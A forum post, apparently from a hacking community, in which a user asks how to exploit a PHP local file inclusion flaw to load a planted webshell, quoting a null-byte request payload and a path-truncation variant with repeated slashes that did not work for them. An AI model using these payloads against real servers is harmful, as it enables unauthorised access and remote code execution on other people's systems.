Have an account?
It looks like you're new here. If you want to get involved, click one of these buttons!
Apply for Membership
Who's Online (5)
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Web Application Security
How to use / to LFI
$xx = $_REQUEST['xx'];
I have a webshell at ./shell.txt
We can GET /vul.php?xx=/../shell.txt%00 to get a shell,
but the php version must before 5.3.4!
However,I had heard another way to get a shell !
The way is : we can GET /vul.php?xx=/../shell.txt////////////////////////////////(here is so many '/')
But,I can't get the shell at last!
Here is the check code:
$xx = 'shell.txt';
$xx .= '/';
Somebody had got a shell by this way!
Did the php have this bug?
Can you help me ? Thx.
PS:I'm not good at English,sorry.
Add a Comment